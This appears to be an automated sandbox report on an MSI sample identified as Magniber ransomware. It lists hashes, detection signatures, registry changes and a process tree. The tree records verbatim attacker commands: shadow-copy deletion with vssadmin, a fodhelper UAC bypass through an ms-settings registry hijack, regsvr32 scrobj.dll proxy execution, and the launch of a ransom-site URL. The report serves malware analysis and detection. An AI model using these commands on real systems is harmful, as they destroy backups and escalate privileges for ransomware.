Analysis
-
max time kernel
147s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
05-08-2024 03:41
Static task
static1
Behavioral task
behavioral1
Sample
41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e.msi
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e.msi
Resource
win10v2004-20240802-en
General
-
Target
41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e.msi
-
Size
96KB
-
MD5
42ad49ed99c0d41a820316309bc2c3b3
-
SHA1
f447a72b3cbea72e1b56fda8f44fd9f304b4474a
-
SHA256
41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e
-
SHA512
4e0af295dc656ad70361363c77646fb899a1ff4a816790959e090125bdba2089eb058dfa2b18bdcede34b45d9420b6f57c0db6aefa32f9799eccec3f163bdf75
-
SSDEEP
1536:kiqCWq/Gf2CJ7ZrhzZr98n+lW0D80D+7fxun:xqCWqu+q8nLLxun
Malware Config
Signatures
-
Detect magniber ransomware 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2952-11-0x000001BF99BE0000-0x000001BF99BE3000-memory.dmp family_magniber -
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (105) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
System Binary Proxy Execution: Regsvr32 1 TTPs 9 IoCs
Abuse Regsvr32 to proxy execution of malicious code.
Processes:
regsvr32.exeregsvr32.exeregsvr32.exeregsvr32.exeregsvr32.exeregsvr32.exeregsvr32.exeregsvr32.exeregsvr32.exepid Process 4592 regsvr32.exe 1280 regsvr32.exe 4636 regsvr32.exe 3780 regsvr32.exe 2364 regsvr32.exe 5084 regsvr32.exe 2780 regsvr32.exe 3492 regsvr32.exe 3556 regsvr32.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc Process File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\Z: msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
MsiExec.exedescription pid Process procid_target PID 4232 set thread context of 2952 4232 MsiExec.exe 51 PID 4232 set thread context of 3020 4232 MsiExec.exe 52 PID 4232 set thread context of 3160 4232 MsiExec.exe 53 -
Drops file in Windows directory 9 IoCs
Processes:
msiexec.exedescription ioc Process File opened for modification C:\Windows\Installer\e58076d.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI7FA.tmp msiexec.exe File created C:\Windows\Installer\e58076d.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{806B562E-D37E-4F22-8C47-582974C985AC} msiexec.exe File opened for modification C:\Windows\Installer\MSIC12.tmp msiexec.exe File created C:\Windows\Installer\e58076f.msi msiexec.exe -
Loads dropped DLL 1 IoCs
Processes:
MsiExec.exepid Process 4232 MsiExec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
-
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vssvc.exedescription ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000082ad35faf8c7b7730000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000082ad35fa0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090082ad35fa000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d82ad35fa000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000082ad35fa00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Interacts with shadow copies 3 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid Process 3824 vssadmin.exe 4116 vssadmin.exe 4028 vssadmin.exe 4792 vssadmin.exe 2896 vssadmin.exe 64 vssadmin.exe -
Modifies registry class 13 IoCs
Processes:
regsvr32.exeregsvr32.exeregsvr32.exesihost.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\shell\open regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\shell\open\command\DelegateExecute regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\shell\open\command\DelegateExecute regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\shell\open\command\DelegateExecute regsvr32.exe Set value (int) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" sihost.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\shell regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\shell\open\command regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\shell\open\command regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\shell\open\command regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh" regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
msiexec.exeMsiExec.exemsedge.exemsedge.exeidentity_helper.exemsedge.exepid Process 4848 msiexec.exe 4848 msiexec.exe 4232 MsiExec.exe 4232 MsiExec.exe 1168 msedge.exe 1168 msedge.exe 2160 msedge.exe 2160 msedge.exe 2868 identity_helper.exe 2868 identity_helper.exe 4500 msedge.exe 4500 msedge.exe 4500 msedge.exe 4500 msedge.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
MsiExec.exepid Process 4232 MsiExec.exe 4232 MsiExec.exe 4232 MsiExec.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
Processes:
msedge.exepid Process 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exemsiexec.exevssvc.exedescription pid Process Token: SeShutdownPrivilege 2868 msiexec.exe Token: SeIncreaseQuotaPrivilege 2868 msiexec.exe Token: SeSecurityPrivilege 4848 msiexec.exe Token: SeCreateTokenPrivilege 2868 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2868 msiexec.exe Token: SeLockMemoryPrivilege 2868 msiexec.exe Token: SeIncreaseQuotaPrivilege 2868 msiexec.exe Token: SeMachineAccountPrivilege 2868 msiexec.exe Token: SeTcbPrivilege 2868 msiexec.exe Token: SeSecurityPrivilege 2868 msiexec.exe Token: SeTakeOwnershipPrivilege 2868 msiexec.exe Token: SeLoadDriverPrivilege 2868 msiexec.exe Token: SeSystemProfilePrivilege 2868 msiexec.exe Token: SeSystemtimePrivilege 2868 msiexec.exe Token: SeProfSingleProcessPrivilege 2868 msiexec.exe Token: SeIncBasePriorityPrivilege 2868 msiexec.exe Token: SeCreatePagefilePrivilege 2868 msiexec.exe Token: SeCreatePermanentPrivilege 2868 msiexec.exe Token: SeBackupPrivilege 2868 msiexec.exe Token: SeRestorePrivilege 2868 msiexec.exe Token: SeShutdownPrivilege 2868 msiexec.exe Token: SeDebugPrivilege 2868 msiexec.exe Token: SeAuditPrivilege 2868 msiexec.exe Token: SeSystemEnvironmentPrivilege 2868 msiexec.exe Token: SeChangeNotifyPrivilege 2868 msiexec.exe Token: SeRemoteShutdownPrivilege 2868 msiexec.exe Token: SeUndockPrivilege 2868 msiexec.exe Token: SeSyncAgentPrivilege 2868 msiexec.exe Token: SeEnableDelegationPrivilege 2868 msiexec.exe Token: SeManageVolumePrivilege 2868 msiexec.exe Token: SeImpersonatePrivilege 2868 msiexec.exe Token: SeCreateGlobalPrivilege 2868 msiexec.exe Token: SeBackupPrivilege 2060 vssvc.exe Token: SeRestorePrivilege 2060 vssvc.exe Token: SeAuditPrivilege 2060 vssvc.exe Token: SeBackupPrivilege 4848 msiexec.exe Token: SeRestorePrivilege 4848 msiexec.exe Token: SeRestorePrivilege 4848 msiexec.exe Token: SeTakeOwnershipPrivilege 4848 msiexec.exe Token: SeRestorePrivilege 4848 msiexec.exe Token: SeTakeOwnershipPrivilege 4848 msiexec.exe Token: SeRestorePrivilege 4848 msiexec.exe Token: SeTakeOwnershipPrivilege 4848 msiexec.exe Token: SeRestorePrivilege 4848 msiexec.exe Token: SeTakeOwnershipPrivilege 4848 msiexec.exe Token: SeRestorePrivilege 4848 msiexec.exe Token: SeTakeOwnershipPrivilege 4848 msiexec.exe Token: SeRestorePrivilege 4848 msiexec.exe Token: SeTakeOwnershipPrivilege 4848 msiexec.exe Token: SeRestorePrivilege 4848 msiexec.exe Token: SeTakeOwnershipPrivilege 4848 msiexec.exe Token: SeRestorePrivilege 4848 msiexec.exe Token: SeTakeOwnershipPrivilege 4848 msiexec.exe Token: SeRestorePrivilege 4848 msiexec.exe Token: SeTakeOwnershipPrivilege 4848 msiexec.exe Token: SeRestorePrivilege 4848 msiexec.exe Token: SeTakeOwnershipPrivilege 4848 msiexec.exe Token: SeRestorePrivilege 4848 msiexec.exe Token: SeTakeOwnershipPrivilege 4848 msiexec.exe Token: SeRestorePrivilege 4848 msiexec.exe Token: SeTakeOwnershipPrivilege 4848 msiexec.exe Token: SeRestorePrivilege 4848 msiexec.exe Token: SeTakeOwnershipPrivilege 4848 msiexec.exe Token: SeRestorePrivilege 4848 msiexec.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
Processes:
msiexec.exemsedge.exepid Process 2868 msiexec.exe 2868 msiexec.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exepid Process 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe 2160 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msiexec.exesihost.exetaskhostw.exesvchost.exeMsiExec.execmd.exemsedge.exedescription pid Process procid_target PID 4848 wrote to memory of 2368 4848 msiexec.exe 93 PID 4848 wrote to memory of 2368 4848 msiexec.exe 93 PID 4848 wrote to memory of 4232 4848 msiexec.exe 95 PID 4848 wrote to memory of 4232 4848 msiexec.exe 95 PID 2952 wrote to memory of 2364 2952 sihost.exe 96 PID 2952 wrote to memory of 2364 2952 sihost.exe 96 PID 3160 wrote to memory of 3780 3160 taskhostw.exe 97 PID 3160 wrote to memory of 3780 3160 taskhostw.exe 97 PID 3020 wrote to memory of 4592 3020 svchost.exe 98 PID 3020 wrote to memory of 4592 3020 svchost.exe 98 PID 4232 wrote to memory of 1420 4232 MsiExec.exe 99 PID 4232 wrote to memory of 1420 4232 MsiExec.exe 99 PID 1420 wrote to memory of 2160 1420 cmd.exe 101 PID 1420 wrote to memory of 2160 1420 cmd.exe 101 PID 2160 wrote to memory of 1988 2160 msedge.exe 102 PID 2160 wrote to memory of 1988 2160 msedge.exe 102 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1300 2160 msedge.exe 103 PID 2160 wrote to memory of 1168 2160 msedge.exe 104 PID 2160 wrote to memory of 1168 2160 msedge.exe 104 PID 2160 wrote to memory of 2000 2160 msedge.exe 105 PID 2160 wrote to memory of 2000 2160 msedge.exe 105 PID 2160 wrote to memory of 2000 2160 msedge.exe 105 PID 2160 wrote to memory of 2000 2160 msedge.exe 105 PID 2160 wrote to memory of 2000 2160 msedge.exe 105 PID 2160 wrote to memory of 2000 2160 msedge.exe 105 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/x5m0mhr74m72⤵
- System Binary Proxy Execution: Regsvr32
- Modifies registry class
PID:2364
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:3824
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:2004
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh4⤵
- System Binary Proxy Execution: Regsvr32
PID:1280 -
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:3824
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:1184
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:3228
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh4⤵
- System Binary Proxy Execution: Regsvr32
PID:3492 -
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:2896
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/x5m0mhr74m72⤵
- System Binary Proxy Execution: Regsvr32
- Modifies registry class
PID:4592
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:1036
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:4764
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh4⤵
- System Binary Proxy Execution: Regsvr32
PID:5084 -
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:4028
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:372
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:4340
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh4⤵
- System Binary Proxy Execution: Regsvr32
PID:3556 -
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:64
-
-
-
-
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
- Suspicious use of WriteProcessMemory
PID:3160 -
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/x5m0mhr74m72⤵
- System Binary Proxy Execution: Regsvr32
- Modifies registry class
PID:3780
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:2960
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:3500
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh4⤵
- System Binary Proxy Execution: Regsvr32
PID:4636 -
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:4116
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:64
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:4764
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh4⤵
- System Binary Proxy Execution: Regsvr32
PID:2780 -
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:4792
-
-
-
-
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e.msi1⤵
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2868
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:2368
-
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 24A418637D146F136416107A9C10BA302⤵
- Suspicious use of SetThreadContext
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4232 -
C:\Windows\System32\cmd.execmd /c "start microsoft-edge:http://e4849888bca4c080686ctbodbmuw.ofrisk.info/tbodbmuw^&2^&45737672^&105^&477^&22190413⤵
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://e4849888bca4c080686ctbodbmuw.ofrisk.info/tbodbmuw&2&45737672&105&477&22190414⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xbc,0x128,0x7ffe5f8046f8,0x7ffe5f804708,0x7ffe5f8047185⤵PID:1988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2072 /prefetch:25⤵PID:1300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:1168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:85⤵PID:2000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:15⤵PID:1804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:15⤵PID:4816
-
-
